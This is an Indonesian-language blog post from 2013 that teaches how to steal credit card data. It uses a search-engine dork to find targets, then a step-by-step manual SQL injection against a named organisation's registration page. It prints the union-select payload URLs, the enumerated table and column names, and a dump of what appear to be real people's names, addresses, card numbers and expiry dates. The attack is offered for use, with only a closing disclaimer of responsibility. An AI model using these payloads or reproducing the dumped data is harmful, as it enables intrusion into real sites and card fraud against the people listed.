Tuesday, October 29, 2013

0 Mencari Credits Card Orang lain Dengan Mudah

cma sekedar berbagi aja gak ada maksut lain..
cari cc ala orang awam (gw).. 

1. cari target...
cari target bisa pake dork, contoh:
Code:
intext:"visa" "Credit Card Number:" "Expiration Date:"
dapet target..
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567

2. cari bug's (langkah yg paling membosankan..)
cari bug's yg rada2 ribet, soalnya gak semua target mempunyai bug's yg bisa di exploitasi (injek2).
bisanya ane cari bug's jga pake dork..
Code:
filetype:php site:target.com
tpi berhubung disini target dah dalam bentuk siap test bug's jadi langsung aja.
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567'
dan hasilnya..
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 5.1 Driver][mysqld-5.5.15]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

/ssl/register.asp, line 30

version mysqld-5.5.15, jadi bisa diinjek2 dengan metode sql injection...

3. injek2..
injek2 bisa pke tools andalan, havij, darkmysqli, sqlmap dkk..
tpi disini ane kasih manual..
3.a
Code:
+order+by+1--
dst..
ketemu sampai.
+order+by+28--
jadi
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12​,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
angka ajaib bisa diliat langsung... 

3.b 
tables
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,2,group_concat(table_nam​e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+inf​ormation_schema.tables+where+table_schema=database()--
hasil
Code:
alzdenvermimauction,alzearlystageforum,alzemailanote,alzevercare,alzevercare_spr​ings,alzgolftournament,alzhelpline,alznecklace,alznecklace2,alznewsletter_prefer​ences,alzpdf_booklet,alzperspectives,alzperspectives2,alzpolarplunge,alzpostanot​e,alzsurvey1,alzsurvey2,alzsurvey3,alzsymposium,alzsymposium2010,alzsymposium_ne​w,alztime,alztimereporting,alztributeflag_denver,alzwhyplunge,customers,formfiel​ds,forms,plainscentercontactus,plainscenterdonate,plainscenterdonotemail,plainsc​enterevents,plainscentergiftmembership,plainscenterjoin,plainscentermembers,plai​nscenternewsletteremails,plainscenternewsletters,plainscenternewslettertesters,p​lainscenterregister,plainscenterusers,plainscentervolunteer,states,wingsbricks,w​ingscontactus,wingscontactus_events,wingsdonations,wingsdonotemail,wingsevents,w​ingskit_item,wingsmembers,wingsnewsletters,wingsnewslettersignup,wingsnewsletter​testemails,wingsregister,wingswasp_counties,wingswasp_evaluation,wingswasp_kit_i​nfo,wingswasp_kit_item,wingswasp_locations,wingswasp_member,wing

3.c 
cek columns
disini ane ambil table alzpdf_booklet to hex = 616c7a7064665f626f6f6b6c6574
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,database(),group_concat(​column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2​8+from+information_schema.columns+where+table_name=0x616c7a7064665f626f6f6b6c657​4--
hasil
Code:
entrydatetime,First_Name,Last_Name,Organization,Address,City,State,Zip_Code,Phon​e_Number,Email_Address,Name_On_CreditCard,Credit_Card_Type,Credit_Card_Number,Cr​edit_Card_Expiration_Month,Credit_Card_Expiration_Year,Total,id,Comments,booklet​option

3.d
dump..
disini ane dump bbrapa columns
Code:
First_Name,0x3a,Last_Name,0x3a,Address,0x3a,City,0x3a,State,0x3a,Credit_Card_Typ​e,0x3a,Credit_Card_Number,0x3a,Credit_Card_Expiration_Month,0x3a,Credit_Card_Exp​iration_Year
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,database(),group_concat(​First_Name,0x3a,Last_Name,0x3a,Address,0x3a,City,0x3a,State,0x3a,Credit_Card_Typ​e,0x3a,Credit_Card_Number,0x3a,Credit_Card_Expiration_Month,0x3a,Credit_Card_Exp​iration_Year),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,​28+from+alzpdf_booklet--
hasil
Code:
david:lampe:111 main:denver:co:VISA:444444444444444:February:2011,david:lampe:111 main:denver:co:VISA:444444444444444:February:2011,john:doe:111 main:denver:co:VISA:44444444444444:February:2011,david:lampe:888 main:denver:co:VISA:444444444444444444:February:2011,david:lampe:222 main:denver:co:VISA:444444444444444:February:2011,david:lampe:222 main:denver:co:VISA:444444444444444:February:2011,Nancy:Schier Anzelmo:2351 Sunset Blvd Ste 170-143:Rocklin:CA:VISA:4388523010180631:March:2013,Mary:Weathersby:2088 Forest St:Denver:CO:MasterCard:5438050146021957:March:2012,Paulette:Hope:8822 S Holland Court:Littleton:CO:VISA:4388576033861181:May:2012,Corkey:Waite:2110 Evenson Dr:Onalaska:wi:MasterCard:5466042011022983:September:2013,Paulette: Hope:8822 S Holland Court:Littleton:CO:VISA:4388576033861181:May:2012,Chrstine:Garrett:11449 W. 105th Way:Wesminster:CO:VISA:4060425063010464:February:2012,Christian:Fussy:4360 South Abilene Circle:Aurora:CO:MasterCard:5291497359878134:March:2012,Mary:Yamada:PO Box 425:Los Alamos
sebenernya sih ccnya bukan cma ada didalam table alzpdf_booklet doang, ada banyak ccnya, sayang gak ada cvvnya.. Hantu


SAYA TIDAK BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TUTORIAL INI 
by satality32
Artikel Di Tulis Oleh :

0 comments:

Post a Comment

Silahkan Om Tinggalkan jejak di blog ini | Semua Orang dapat berkomentar di Blog ini dan Bila Om tidak punya akun Gmail / OpenID , om dapat mengunakan Fitur Tanpa Nama , jadi Om bisa berkomentar di blog ini , tp ingat om komentarnya jangan Gunakan bahasa kasar / jorok , karena blog ini di baca di seluruh dunia



==>> Komentar Mu adalah Harimau mu <<==

Subscribe to: Post Comments (Atom)
 
Copyright © 2011-2013. Satality32 - All Rights Reserved.
Facebook . Twitter . Google+ . Sent Email
Template Design by Eka Syahwan (p0rt666) - Powered by Blogger.